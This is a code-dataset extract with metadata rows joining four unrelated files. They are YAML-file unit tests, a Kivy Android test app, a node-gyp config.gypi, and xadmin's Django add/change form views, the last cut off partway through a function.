# return True means don't make changes after all
return True
assert not yaml._dirty
yaml.transform_yaml(transformer)
assert not yaml._dirty
yaml.save()
assert yaml.change_count == 2
import codecs
with codecs.open(filename, 'r', 'utf-8') as file:
changed = file.read()
expected = """
# yaml file
{}
""" [1:]
assert expected == changed
with_directory_contents(dict(), transform_test)
def test_multiple_saves_ignored_if_not_dirty():
def check_dirty_handling(dirname):
filename = os.path.join(dirname, "foo.yaml")
assert not os.path.exists(filename)
yaml = YamlFile(filename)
assert yaml.change_count == 1
yaml.set_value(["a", "b"], 42)
yaml.save()
assert yaml.change_count == 2
assert os.path.exists(filename)
time1 = os.path.getmtime(filename)
yaml.save()
assert time1 == os.path.getmtime(filename)
assert yaml.change_count == 2
yaml.save()
assert time1 == os.path.getmtime(filename)
assert yaml.change_count == 2
yaml.set_value(["a", "b"], 43)
assert time1 == os.path.getmtime(filename)
assert yaml.change_count == 2
yaml.save()
# OS mtime resolution might leave these equal
assert time1 <= os.path.getmtime(filename)
assert yaml.change_count == 3
with_directory_contents(dict(), check_dirty_handling)
def test_save_ignored_if_not_dirty_after_load():
def check_dirty_handling(dirname):
filename = os.path.join(dirname, "foo.yaml")
assert not os.path.exists(filename)
yaml = YamlFile(filename)
yaml.set_value(["a", "b"], 42)
yaml.save()
assert os.path.exists(filename)
time1 = os.path.getmtime(filename)
yaml2 = YamlFile(filename)
assert time1 == os.path.getmtime(filename)
assert yaml2.change_count == 1
yaml2.save()
assert time1 == os.path.getmtime(filename)
assert yaml2.change_count == 1
with_directory_contents(dict(), check_dirty_handling)
def test_throw_if_cannot_create_directory(monkeypatch):
def mock_makedirs(path, mode=0):
raise IOError("this is not EEXIST")
monkeypatch.setattr("os.makedirs", mock_makedirs)
def check_throw_if_cannot_create(dirname):
subdir = "bar"
filename = os.path.join(dirname, subdir, "foo.yaml")
yaml = YamlFile(filename)
yaml.set_value(["a", "b"], 42)
with pytest.raises(IOError) as excinfo:
yaml.save()
assert "this is not EEXIST" in repr(excinfo.value)
with_directory_contents(dict(), check_throw_if_cannot_create)
def test_read_corrupted_yaml_file():
def check_corrupted(filename):
yaml = YamlFile(filename)
assert yaml.corrupted
assert "mapping values are not allowed here" in yaml.corrupted_error_message
# it should raise an exception if you try to modify
with pytest.raises(ValueError) as excinfo:
yaml.set_value(["foo", "bar"], 42)
assert "Cannot modify corrupted" in repr(excinfo.value)
with pytest.raises(ValueError) as excinfo:
yaml.save()
assert "Cannot modify corrupted" in repr(excinfo.value)
with pytest.raises(ValueError) as excinfo:
def make_changes(yaml):
return False
yaml.transform_yaml(make_changes)
assert "Cannot modify corrupted" in repr(excinfo.value)
# the file should appear empty if you try to get anything,
# but it shouldn't throw
assert yaml._yaml is not None
assert yaml.get_value(["a", "b"]) is None
with_file_contents("""
^
a:
b: c
""", check_corrupted)
def test_roundtrip_yaml_file_preserving_order_and_comments():
original_content = """
# comment in front of a
a:
x: y
# comment in front of z
z: q
b:
i: j
# whitespace in front of this comment in front of k
k: l
c:
# comment before a list item
- foo
- bar # comment after a list item
d:
hello: world
foo: bar
e:
woot: woot
# comment at the end of e
# comment in column 0 at the end
# this one is a block comment
# which continues several lines
"""
def check_roundtrip(filename):
yaml = YamlFile(filename)
yaml._dirty = True
yaml.save()
new_content = open(filename, 'r').read()
print("the re-saved version of the file was:")
print(new_content)
assert original_content != new_content
# We don't require that the YAML backend preserves every
# formatting detail, but it can't reorder things or lose
# comments because if it did users would be annoyed.
# Minor whitespace changes are OK, though ideally we'd
# avoid even those.
def canonicalize(content):
if content.startswith("\n"):
content = content[1:]
return content.replace(" ", "").replace("\n\n", "\n")
original_canon = canonicalize(original_content)
new_canon = canonicalize(new_content)
assert original_canon == new_canon
with_file_contents(original_content, check_roundtrip)
def test_read_yaml_file_and_unset_values():
# testing single-item dict, two-item dict, and toplevel value
original_content = """
a:
b: 1
x:
y: 2
z: 3
q: 4
"""
def unset_values(filename):
yaml = YamlFile(filename)
assert yaml.change_count == 1
a_b = yaml.get_value(["a", "b"])
assert 1 == a_b
x_y = yaml.get_value(["x", "y"])
assert 2 == x_y
x_z = yaml.get_value(["x", "z"])
assert 3 == x_z
q = yaml.get_value("q")
assert 4 == q
def assert_unset_on_reload(path):
yaml2 = YamlFile(filename)
assert yaml2.change_count == 1
value2 = yaml2.get_value(path, None)
assert value2 is None
scope = dict(last_change=yaml.change_count)
def check_unset(path):
assert yaml.change_count == scope['last_change']
assert not yaml._dirty
yaml.unset_value(path)
assert yaml.get_value(path, None) is None
assert yaml._dirty
yaml.save()
assert yaml.change_count == (scope['last_change'] + 1)
scope['last_change'] += 1
assert_unset_on_reload(path)
check_unset(["a", "b"])
check_unset(["x", "y"])
check_unset(["x", "z"])
check_unset("q")
assert not yaml._dirty
yaml.unset_value("not_in_there")
assert not yaml._dirty
with_file_contents(original_content, unset_values)
def test_read_yaml_file_and_set_get_empty_string():
def check(filename):
yaml = YamlFile(filename)
assert not yaml.corrupted
assert yaml.corrupted_error_message is None
assert yaml.change_count == 1
value = yaml.get_value("a", None)
assert value is None
yaml.set_value("a", '')
value = yaml.get_value("a", None)
assert value == ''
# only-whitespace string
yaml.set_value("a", ' ')
value = yaml.get_value("a", None)
assert value == ' '
with_file_contents("", check)
| [
"hp@pobox.com"
] | hp@pobox.com |
963b0a84d3f5586261ec0ed22a68007f2a76aa70 | 0a1356b97465cc1d5c3f661f61b3b8c51fb05d46 | /android_binding/.buildozer/android/platform/python-for-android/testapps/testapp/main.py | 5baa420f3c203147e6abbfe8085c24a0a8778493 | [
"MIT",
"Python-2.0"
] | permissive | Rohan-cod/cross_platform_calc | 00360f971e4da68dd36d6836c9ddbb157f6b77d5 | 5785a5e8150d174019b330c812e7eb012cc4dd79 | refs/heads/master | 2022-12-22T10:29:05.317051 | 2021-06-05T10:52:44 | 2021-06-05T10:52:44 | 237,465,912 | 2 | 1 | MIT | 2022-12-09T05:18:55 | 2020-01-31T16:07:31 | C | UTF-8 | Python | false | false | 4,015 | py | print('main.py was successfully called')
import os
print('imported os')
print('this dir is', os.path.abspath(os.curdir))
print('contents of this dir', os.listdir('./'))
import sys
print('pythonpath is', sys.path)
import kivy
print('imported kivy')
print('file is', kivy.__file__)
from kivy.app import App
from kivy.lang import Builder
from kivy.properties import StringProperty
from kivy.uix.popup import Popup
from kivy.clock import Clock
print('Imported kivy')
from kivy.utils import platform
print('platform is', platform)
kv = '''
#:import Metrics kivy.metrics.Metrics
#:import sys sys
<FixedSizeButton@Button>:
size_hint_y: None
height: dp(60)
ScrollView:
GridLayout:
cols: 1
size_hint_y: None
height: self.minimum_height
FixedSizeButton:
text: 'test pyjnius'
on_press: app.test_pyjnius()
Image:
keep_ratio: False
allow_stretch: True
source: 'colours.png'
size_hint_y: None
height: dp(100)
Label:
height: self.texture_size[1]
size_hint_y: None
font_size: 100
text_size: self.size[0], None
markup: True
text: '[b]Kivy[/b] on [b]SDL2[/b] on [b]Android[/b]!'
halign: 'center'
Label:
height: self.texture_size[1]
size_hint_y: None
text_size: self.size[0], None
markup: True
text: sys.version
halign: 'center'
padding_y: dp(10)
Widget:
size_hint_y: None
height: 20
Label:
height: self.texture_size[1]
size_hint_y: None
font_size: 50
text_size: self.size[0], None
markup: True
text: 'dpi: {}\\ndensity: {}\\nfontscale: {}'.format(Metrics.dpi, Metrics.density, Metrics.fontscale)
halign: 'center'
FixedSizeButton:
text: 'test ctypes'
on_press: app.test_ctypes()
FixedSizeButton:
text: 'test numpy'
on_press: app.test_numpy()
Widget:
size_hint_y: None
height: 1000
on_touch_down: print('touched at', args[-1].pos)
<ErrorPopup>:
title: 'Error'
size_hint: 0.75, 0.75
Label:
text: root.error_text
'''
class ErrorPopup(Popup):
    """Modal popup displaying an error message (styled by the <ErrorPopup> kv rule)."""
    # Message shown in the popup body; set by raise_error().
    error_text = StringProperty('')
def raise_error(error):
    """Log *error* to stdout and show it to the user in a modal popup."""
    print('ERROR:', error)
    popup = ErrorPopup(error_text=error)
    popup.open()
class TestApp(App):
    """Kivy demo app exercising metrics, pyjnius, ctypes and numpy on Android."""

    def build(self):
        # Build the UI from the module-level kv string and start a 2 s heartbeat.
        root = Builder.load_string(kv)
        Clock.schedule_interval(self.print_something, 2)
        # Clock.schedule_interval(self.test_pyjnius, 5)
        print('testing metrics')
        from kivy.metrics import Metrics
        print('dpi is', Metrics.dpi)
        print('density is', Metrics.density)
        print('fontscale is', Metrics.fontscale)
        return root

    def print_something(self, *args):
        # Heartbeat scheduled in build(); confirms the event loop keeps running.
        print('App print tick', Clock.get_boottime())

    def on_pause(self):
        # Returning True lets Android pause the app instead of killing it.
        return True

    def test_pyjnius(self, *args):
        """Vibrate the device for 1 s via pyjnius, or pop an error dialog."""
        try:
            from jnius import autoclass
        except ImportError:
            raise_error('Could not import pyjnius')
            return
        print('Attempting to vibrate with pyjnius')
        # PythonActivity = autoclass('org.renpy.android.PythonActivity')
        # activity = PythonActivity.mActivity
        PythonActivity = autoclass('org.kivy.android.PythonActivity')
        activity = PythonActivity.mActivity
        # NOTE(review): Intent is loaded but never used below — presumably kept
        # to verify the class resolves; confirm before removing.
        Intent = autoclass('android.content.Intent')
        Context = autoclass('android.content.Context')
        vibrator = activity.getSystemService(Context.VIBRATOR_SERVICE)
        vibrator.vibrate(1000)

    def test_ctypes(self, *args):
        # Import-only smoke test: passes iff ctypes is bundled in the APK.
        import ctypes

    def test_numpy(self, *args):
        # Smoke test that numpy imports and basic array ops work on-device.
        import numpy
        print(numpy.zeros(5))
        print(numpy.arange(5))
        print(numpy.random.random((3, 3)))
TestApp().run()
| [
"rohaninjmu@gmail.com"
] | rohaninjmu@gmail.com |
4159b4e566f28b6eb342aa69e94e92358c2909df | 1507c045f1ceec9d73c0fc71e520c3e561461e1b | /node_modules/binaryjs/node_modules/streamws/build/config.gypi | cb18c71e586dda92524b900990c70b0dfc622c81 | [
"MIT"
] | permissive | jimmychimmyy/KandiTag-Backend | bfa5523d7a25e3d9e5d761a0c3b76d1b17e928c3 | aa1a908fe25002565f7504e37881f755c4658813 | refs/heads/master | 2021-05-29T12:52:57.203778 | 2015-08-29T23:08:11 | 2015-08-29T23:08:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,108 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 1,
"host_arch": "x64",
"node_install_npm": "true",
"node_prefix": "",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"openssl_no_asm": 0,
"python": "/usr/bin/python",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "false",
"want_separate_host_toolset": 0,
"nodedir": "/Users/Jim/.node-gyp/0.10.32",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"save_dev": "",
"viewer": "man",
"browser": "",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"shell": "/bin/bash",
"init_author_url": "",
"shrinkwrap": "true",
"parseable": "",
"init_license": "ISC",
"email": "",
"sign_git_tag": "",
"init_author_email": "",
"cache_max": "Infinity",
"long": "",
"local_address": "",
"git_tag_version": "true",
"cert": "",
"npat": "",
"fetch_retries": "2",
"registry": "https://registry.npmjs.org/",
"versions": "",
"message": "%s",
"key": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"spin": "true",
"cache_lock_retries": "10",
"cafile": "",
"heading": "npm",
"proprietary_attribs": "true",
"fetch_retry_mintimeout": "10000",
"json": "",
"https_proxy": "",
"engine_strict": "",
"description": "true",
"userconfig": "/Users/Jim/.npmrc",
"init_module": "/Users/Jim/.npm-init.js",
"user": "501",
"node_version": "0.10.32",
"save": "",
"editor": "vi",
"tag": "latest",
"global": "",
"username": "",
"optional": "true",
"force": "",
"bin_links": "true",
"searchopts": "",
"depth": "Infinity",
"searchsort": "name",
"rebuild_bundle": "true",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"strict_ssl": "true",
"save_prefix": "^",
"ca": "",
"save_exact": "",
"group": "20",
"fetch_retry_factor": "10",
"dev": "",
"version": "",
"cache_lock_stale": "60000",
"cache_min": "10",
"searchexclude": "",
"cache": "/Users/Jim/.npm",
"color": "true",
"save_optional": "",
"ignore_scripts": "",
"user_agent": "npm/1.4.28 node/v0.10.32 darwin x64",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"umask": "18",
"init_author_name": "",
"git": "git",
"unsafe_perm": "",
"tmp": "/tmp",
"onload_script": "",
"prefix": "/usr/local",
"link": ""
}
}
| [
"jimmychimmyy@gmail.com"
] | jimmychimmyy@gmail.com |
c9d0a1287699c68e80691464c75983561dfea3f4 | 944d4bdedaf892ae2487f43715c5f1fd5b7b44c4 | /party/xadmin/views/edit.py | 34df9ecf4115017bce3d576a84aadfb416c2fdac | [] | no_license | laomd-2/partybuilding | c7d5076fd7803f09a4e955cb2aecf7b07b00f4d7 | 18cd80da82db4c873027d2d890fa8c83bcaf6e0b | refs/heads/master | 2021-06-23T10:40:37.280590 | 2020-03-22T12:40:38 | 2020-03-22T12:41:11 | 168,854,119 | 0 | 1 | null | 2021-06-10T21:23:46 | 2019-02-02T16:53:46 | TSQL | UTF-8 | Python | false | false | 20,635 | py | from __future__ import absolute_import
import copy
from crispy_forms.utils import TEMPLATE_PACK
from django import forms
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import PermissionDenied, FieldError
from django.db import models, transaction
from django.forms.models import modelform_factory, modelform_defines_fields
from django.http import Http404, HttpResponseRedirect
from django.template.response import TemplateResponse
from django.utils import six
from django.utils.encoding import force_text
from django.utils.html import escape
from django.utils.text import capfirst, get_text_list
from django.template import loader
from django.utils.translation import ugettext as _
from django.forms.widgets import Media
from xadmin import widgets
from xadmin.layout import FormHelper, Layout, Fieldset, TabHolder, Container, Column, Col, Field
from xadmin.util import unquote
from xadmin.views.detail import DetailAdminUtil
from .base import ModelAdminView, filter_hook, csrf_protect_m
FORMFIELD_FOR_DBFIELD_DEFAULTS = {
models.DateTimeField: {
'form_class': forms.SplitDateTimeField,
'widget': widgets.AdminSplitDateTime
},
models.DateField: {'widget': widgets.AdminDateWidget},
models.TimeField: {'widget': widgets.AdminTimeWidget},
models.TextField: {'widget': widgets.AdminTextareaWidget},
models.URLField: {'widget': widgets.AdminURLFieldWidget},
models.IntegerField: {'widget': widgets.AdminIntegerFieldWidget},
models.BigIntegerField: {'widget': widgets.AdminIntegerFieldWidget},
models.CharField: {'widget': widgets.AdminTextInputWidget},
models.IPAddressField: {'widget': widgets.AdminTextInputWidget},
models.ImageField: {'widget': widgets.AdminFileWidget},
models.FileField: {'widget': widgets.AdminFileWidget},
models.ForeignKey: {'widget': widgets.AdminSelectWidget},
models.OneToOneField: {'widget': widgets.AdminSelectWidget},
models.ManyToManyField: {'widget': widgets.AdminSelectMultiple},
}
class ReadOnlyField(Field):
    """Crispy layout field that renders a read-only value via the detail view."""

    template = "xadmin/layout/field_value.html"

    def __init__(self, *args, **kwargs):
        # The detail-view helper is injected by the form helper that wraps us.
        self.detail = kwargs.pop('detail')
        super(ReadOnlyField, self).__init__(*args, **kwargs)

    def render(self, form, form_style, context, template_pack=TEMPLATE_PACK, **kwargs):
        # Render each wrapped field name through the read-only value template.
        pieces = []
        for name in self.fields:
            pieces.append(loader.render_to_string(
                self.template,
                {'field': {'auto_id': name},
                 'result': self.detail.get_field_result(name)}))
        return ''.join(pieces)
class ModelFormAdminView(ModelAdminView):
    """Base view for add/change forms.

    Builds the ModelForm class, the crispy-forms layout/helper, and drives
    the shared GET/POST lifecycle used by CreateAdminView and UpdateAdminView.
    """
    form = forms.ModelForm
    formfield_overrides = {}
    readonly_fields = ()
    style_fields = {}
    exclude = None
    relfield_style = None

    save_as = False
    save_on_top = False

    add_form_template = None
    change_form_template = None

    form_layout = None

    def __init__(self, request, *args, **kwargs):
        # Layer the per-admin widget overrides on top of the global defaults.
        overrides = FORMFIELD_FOR_DBFIELD_DEFAULTS.copy()
        overrides.update(self.formfield_overrides)
        self.formfield_overrides = overrides
        super(ModelFormAdminView, self).__init__(request, *args, **kwargs)

    @filter_hook
    def formfield_for_dbfield(self, db_field, **kwargs):
        """Return the form field for *db_field*, or None to hide it."""
        # If it uses an intermediary model that isn't auto created, don't show
        # a field in admin.
        if isinstance(db_field, models.ManyToManyField) and not db_field.remote_field.through._meta.auto_created:
            return None

        attrs = self.get_field_attrs(db_field, **kwargs)
        return db_field.formfield(**dict(attrs, **kwargs))

    @filter_hook
    def get_field_style(self, db_field, style, **kwargs):
        """Map a style name ('radio', 'checkbox', ...) to formfield kwargs,
        or None when the style does not apply to this field type."""
        if style in ('radio', 'radio-inline') and (db_field.choices or isinstance(db_field, models.ForeignKey)):
            attrs = {'widget': widgets.AdminRadioSelect(
                attrs={'inline': 'inline' if style == 'radio-inline' else ''})}
            if db_field.choices:
                attrs['choices'] = db_field.get_choices(
                    include_blank=db_field.blank,
                    blank_choice=[('', _('Null'))]
                )
            return attrs

        if style in ('checkbox', 'checkbox-inline') and isinstance(db_field, models.ManyToManyField):
            return {'widget': widgets.AdminCheckboxSelect(attrs={'inline': style == 'checkbox-inline'}),
                    'help_text': None}

    @filter_hook
    def get_field_attrs(self, db_field, **kwargs):
        """Resolve formfield kwargs for *db_field*: explicit style_fields
        first, then the related admin's relfield_style, then choices, then
        the formfield_overrides table keyed by field class MRO."""
        if db_field.name in self.style_fields:
            attrs = self.get_field_style(
                db_field, self.style_fields[db_field.name], **kwargs)
            if attrs:
                return attrs

        if hasattr(db_field, "rel") and db_field.rel:
            related_modeladmin = self.admin_site._registry.get(db_field.rel.to)
            if related_modeladmin and hasattr(related_modeladmin, 'relfield_style'):
                attrs = self.get_field_style(
                    db_field, related_modeladmin.relfield_style, **kwargs)
                if attrs:
                    return attrs

        if db_field.choices:
            return {'widget': widgets.AdminSelectWidget}

        # Walk the MRO so e.g. a subclass of CharField still gets the
        # CharField override.
        for klass in db_field.__class__.mro():
            if klass in self.formfield_overrides:
                return self.formfield_overrides[klass].copy()

        return {}

    @filter_hook
    def prepare_form(self):
        # Build (but do not instantiate) the ModelForm class.
        self.model_form = self.get_model_form()

    @filter_hook
    def instance_forms(self):
        # Instantiate the form with request data / instance (see get_form_datas).
        self.form_obj = self.model_form(**self.get_form_datas())

    def setup_forms(self):
        helper = self.get_form_helper()
        if helper:
            self.form_obj.helper = helper

    @filter_hook
    def valid_forms(self):
        return self.form_obj.is_valid()

    @filter_hook
    def get_model_form(self, **kwargs):
        """
        Returns a Form class for use in the admin add view. This is used by
        add_view and change_view.
        """
        if self.exclude is None:
            exclude = []
        else:
            exclude = list(self.exclude)
        exclude.extend(self.get_readonly_fields())
        if self.exclude is None and hasattr(self.form, '_meta') and self.form._meta.exclude:
            # Take the custom ModelForm's Meta.exclude into account only if the
            # ModelAdmin doesn't define its own.
            exclude.extend(self.form._meta.exclude)
        # if exclude is an empty list we pass None to be consistant with the
        # default on modelform_factory
        exclude = exclude or None
        defaults = {
            "form": self.form,
            "fields": self.fields and list(self.fields) or None,
            "exclude": exclude,
            "formfield_callback": self.formfield_for_dbfield,
        }
        defaults.update(kwargs)

        if defaults['fields'] is None and not modelform_defines_fields(defaults['form']):
            defaults['fields'] = forms.ALL_FIELDS

        # BUGFIX: an unconditional `return modelform_factory(...)` used to sit
        # here, making the try/except below unreachable dead code and losing
        # the helpful FieldError message. The guarded call is now the only one.
        try:
            return modelform_factory(self.model, **defaults)
        except FieldError as e:
            raise FieldError('%s. Check fields/fieldsets/exclude attributes of class %s.'
                             % (e, self.__class__.__name__))

    @filter_hook
    def get_form_layout(self):
        """Normalize ``form_layout`` into a crispy Layout, appending any
        fields not mentioned by the layout under an 'Other Fields' fieldset."""
        layout = copy.deepcopy(self.form_layout)
        arr = self.form_obj.fields.keys()
        if six.PY3:
            arr = [k for k in arr]
        fields = arr + list(self.get_readonly_fields())

        if layout is None:
            layout = Layout(Container(Col('full',
                                          Fieldset("", *fields, css_class="unsort no_title"), horizontal=True, span=12)
                                      ))
        elif type(layout) in (list, tuple) and len(layout) > 0:
            # Wrap bare fieldsets/fields in a full-width column.
            if isinstance(layout[0], Column):
                fs = layout
            elif isinstance(layout[0], (Fieldset, TabHolder)):
                fs = (Col('full', *layout, horizontal=True, span=12),)
            else:
                fs = (Col('full', Fieldset("", *layout, css_class="unsort no_title"), horizontal=True, span=12),)

            layout = Layout(Container(*fs))

            rendered_fields = [i[1] for i in layout.get_field_names()]
            container = layout[0].fields
            other_fieldset = Fieldset(_(u'Other Fields'), *[f for f in fields if f not in rendered_fields])

            if len(other_fieldset.fields):
                if len(container) and isinstance(container[0], Column):
                    container[0].fields.append(other_fieldset)
                else:
                    container.append(other_fieldset)

        return layout

    def get_form_helper(self):
        helper = FormHelper()
        helper.form_tag = False
        helper.include_media = False
        helper.add_layout(self.get_form_layout())

        # deal with readonly fields: wrap them so they render as values,
        # not inputs (they are excluded from the form in get_model_form).
        readonly_fields = self.get_readonly_fields()
        if readonly_fields:
            detail = self.get_model_view(
                DetailAdminUtil, self.model, self.form_obj.instance)
            for field in readonly_fields:
                helper[field].wrap(ReadOnlyField, detail=detail)

        return helper

    @filter_hook
    def get_readonly_fields(self):
        """
        Hook for specifying custom readonly fields.
        """
        return self.readonly_fields

    @filter_hook
    def save_forms(self):
        # Build the instance without hitting the DB; save_models() commits.
        self.new_obj = self.form_obj.save(commit=False)

    @filter_hook
    def change_message(self):
        """Human-readable summary of what this submit changed, for the log."""
        change_message = []
        if self.org_obj is None:
            change_message.append(_('Added.'))
        elif self.form_obj.changed_data:
            change_message.append(_('Changed %s.') % get_text_list(self.form_obj.changed_data, _('and')))

        change_message = ' '.join(change_message)
        return change_message or _('No fields changed.')

    @filter_hook
    def save_models(self):
        self.new_obj.save()
        flag = self.org_obj is None and 'create' or 'change'
        self.log(flag, self.change_message(), self.new_obj)

    @filter_hook
    def save_related(self):
        # M2M data can only be saved once the instance has a pk.
        self.form_obj.save_m2m()

    @csrf_protect_m
    @filter_hook
    def get(self, request, *args, **kwargs):
        self.instance_forms()
        self.setup_forms()

        return self.get_response()

    @csrf_protect_m
    @transaction.atomic
    @filter_hook
    def post(self, request, *args, **kwargs):
        self.instance_forms()
        self.setup_forms()

        if self.valid_forms():
            self.save_forms()
            self.save_models()
            self.save_related()
            response = self.post_response()
            # post_response() may return either a redirect URL string or a
            # ready HttpResponse.
            cls_str = str if six.PY3 else basestring
            if isinstance(response, cls_str):
                return HttpResponseRedirect(response)
            else:
                return response

        return self.get_response()

    @filter_hook
    def get_context(self):
        """Template context shared by the add and change form pages."""
        add = self.org_obj is None
        change = self.org_obj is not None

        new_context = {
            'form': self.form_obj,
            'original': self.org_obj,
            'show_delete': self.org_obj is not None,
            'add': add,
            'change': change,
            'errors': self.get_error_list(),

            'has_add_permission': self.has_add_permission(),
            'has_view_permission': self.has_view_permission(),
            'has_change_permission': self.has_change_permission(self.org_obj),
            'has_delete_permission': self.has_delete_permission(self.org_obj),

            'has_file_field': True,  # FIXME - this should check if form or formsets have a FileField,
            'has_absolute_url': hasattr(self.model, 'get_absolute_url'),
            'form_url': '',
            'content_type_id': ContentType.objects.get_for_model(self.model).id,
            'save_as': self.save_as,
            'save_on_top': self.save_on_top,
        }

        # for submit line
        new_context.update({
            'onclick_attrib': '',
            'show_delete_link': (new_context['has_delete_permission']
                                 and (change or new_context['show_delete'])),
            'show_save_as_new': change and self.save_as,
            'show_save_and_add_another': new_context['has_add_permission'] and
                                (not self.save_as or add),
            'show_save_and_continue': new_context['has_change_permission'],
            'show_save': True
        })

        if self.org_obj and new_context['show_delete_link']:
            new_context['delete_url'] = self.model_admin_url(
                'delete', self.org_obj.pk)

        context = super(ModelFormAdminView, self).get_context()
        context.update(new_context)
        return context

    @filter_hook
    def get_error_list(self):
        """Flatten all form errors into a single ErrorList for the template."""
        errors = forms.utils.ErrorList()
        if self.form_obj.is_bound:
            errors.extend(self.form_obj.errors.values())
        return errors

    @filter_hook
    def get_media(self):
        try:
            m = self.form_obj.media
        # Narrowed from a bare `except:` which also swallowed
        # KeyboardInterrupt/SystemExit; an unmedia-able form still
        # falls back to an empty Media object.
        except Exception:
            m = Media()
        return super(ModelFormAdminView, self).get_media() + m + \
            self.vendor('xadmin.page.form.js', 'xadmin.form.css')
class CreateAdminView(ModelFormAdminView):
    """Add-object view: renders an empty model form and saves a new instance."""

    def init_request(self, *args, **kwargs):
        # No original object exists for an add view.
        self.org_obj = None

        if not self.has_add_permission():
            raise PermissionDenied

        # comm method for both get and post
        self.prepare_form()

    @filter_hook
    def get_form_datas(self):
        """Return kwargs for instantiating the form: initial data from the
        query string on GET, posted data and files on POST."""
        # Prepare the dict of initial data from the request.
        # We have to special-case M2Ms as a list of comma-separated PKs.
        if self.request_method == 'get':
            initial = dict(self.request.GET.items())
            for k in initial:
                try:
                    f = self.opts.get_field(k)
                except models.FieldDoesNotExist:
                    # Unknown query parameters are silently ignored.
                    continue
                if isinstance(f, models.ManyToManyField):
                    initial[k] = initial[k].split(",")
            return {'initial': initial}
        else:
            return {'data': self.request.POST, 'files': self.request.FILES}

    @filter_hook
    def get_context(self):
        new_context = {
            'title': _('Add %s') % force_text(self.opts.verbose_name),
        }
        context = super(CreateAdminView, self).get_context()
        context.update(new_context)
        return context

    @filter_hook
    def get_breadcrumb(self):
        # Append an 'Add <model>' crumb; linked only when the user may add.
        bcs = super(ModelFormAdminView, self).get_breadcrumb()
        item = {'title': _('Add %s') % force_text(self.opts.verbose_name)}
        if self.has_add_permission():
            item['url'] = self.model_admin_url('add')
        bcs.append(item)

        return bcs

    @filter_hook
    def get_response(self):
        # Render the add form template with any extra kwargs from the URLconf.
        context = self.get_context()
        context.update(self.kwargs or {})

        return TemplateResponse(
            self.request, self.add_form_template or self.get_template_list(
                'views/model_form.html'),
            context)

    @filter_hook
    def post_response(self):
        """
        Determines the HttpResponse for the add_view stage.
        """
        request = self.request

        msg = _(
            'The %(name)s "%(obj)s" was added successfully.') % {'name': force_text(self.opts.verbose_name),
                                                                 'obj': "<a class='alert-link' href='%s'>%s</a>" % (self.model_admin_url('change', self.new_obj._get_pk_val()), force_text(self.new_obj))}

        if "_continue" in request.POST:
            # 'Save and continue editing': go to the new object's change page.
            self.message_user(
                msg + ' ' + _("You may edit it again below."), 'success')
            return self.model_admin_url('change', self.new_obj._get_pk_val())

        if "_addanother" in request.POST:
            # 'Save and add another': stay on the add page.
            self.message_user(msg + ' ' + (_("You may add another %s below.") % force_text(self.opts.verbose_name)), 'success')
            return request.path
        else:
            self.message_user(msg, 'success')

            # Figure out where to redirect. If the user has change permission,
            # redirect to the change-list page for this object. Otherwise,
            # redirect to the admin index.
            if "_redirect" in request.POST:
                return request.POST["_redirect"]
            elif self.has_view_permission():
                return self.model_admin_url('changelist')
            else:
                return self.get_admin_url('index')
class UpdateAdminView(ModelFormAdminView):
    """Admin view that renders and processes the change-object page."""
    def init_request(self, object_id, *args, **kwargs):
        self.org_obj = self.get_object(unquote(object_id))
        # NOTE(review): the permission check runs before the None check
        # below, so has_change_permission must tolerate org_obj being
        # None - confirm against its implementation.
        if not self.has_change_permission(self.org_obj):
            raise PermissionDenied
        if self.org_obj is None:
            raise Http404(_('%(name)s object with primary key %(key)r does not exist.') %
                          {'name': force_text(self.opts.verbose_name), 'key': escape(object_id)})
        # comm method for both get and post
        self.prepare_form()
    @filter_hook
    def get_form_datas(self):
        # Always bind the existing instance; POST additionally binds the
        # submitted data and uploaded files.
        params = {'instance': self.org_obj}
        if self.request_method == 'post':
            params.update(
                {'data': self.request.POST, 'files': self.request.FILES})
        return params
    @filter_hook
    def get_context(self):
        new_context = {
            'title': _('Change %s') % force_text(self.org_obj),
            'object_id': str(self.org_obj.pk),
        }
        context = super(UpdateAdminView, self).get_context()
        context.update(new_context)
        return context
    @filter_hook
    def get_breadcrumb(self):
        # Calls super(ModelFormAdminView, ...) to skip this class's own
        # contribution and extend the base breadcrumb directly.
        bcs = super(ModelFormAdminView, self).get_breadcrumb()
        item = {'title': force_text(self.org_obj)}
        if self.has_change_permission():
            item['url'] = self.model_admin_url('change', self.org_obj.pk)
        bcs.append(item)
        return bcs
    @filter_hook
    def get_response(self, *args, **kwargs):
        context = self.get_context()
        context.update(kwargs or {})
        return TemplateResponse(
            self.request, self.change_form_template or self.get_template_list(
                'views/model_form.html'),
            context)
    def post(self, request, *args, **kwargs):
        # "Save as new" is delegated to the add view for this model.
        if "_saveasnew" in self.request.POST:
            return self.get_model_view(CreateAdminView, self.model).post(request)
        return super(UpdateAdminView, self).post(request, *args, **kwargs)
    @filter_hook
    def post_response(self):
        """
        Determines the HttpResponse for the change_view stage.

        Returns a redirect target (URL string) chosen by the submit button
        that was pressed (_continue / _addanother / plain save).
        """
        opts = self.new_obj._meta
        obj = self.new_obj
        request = self.request
        verbose_name = opts.verbose_name
        pk_value = obj._get_pk_val()  # NOTE(review): currently unused below
        msg = _('The %(name)s "%(obj)s" was changed successfully.') % {'name':
                                                                      force_text(verbose_name), 'obj': force_text(obj)}
        if "_continue" in request.POST:
            self.message_user(
                msg + ' ' + _("You may edit it again below."), 'success')
            return request.path
        elif "_addanother" in request.POST:
            self.message_user(msg + ' ' + (_("You may add another %s below.")
                                           % force_text(verbose_name)), 'success')
            return self.model_admin_url('add')
        else:
            self.message_user(msg, 'success')
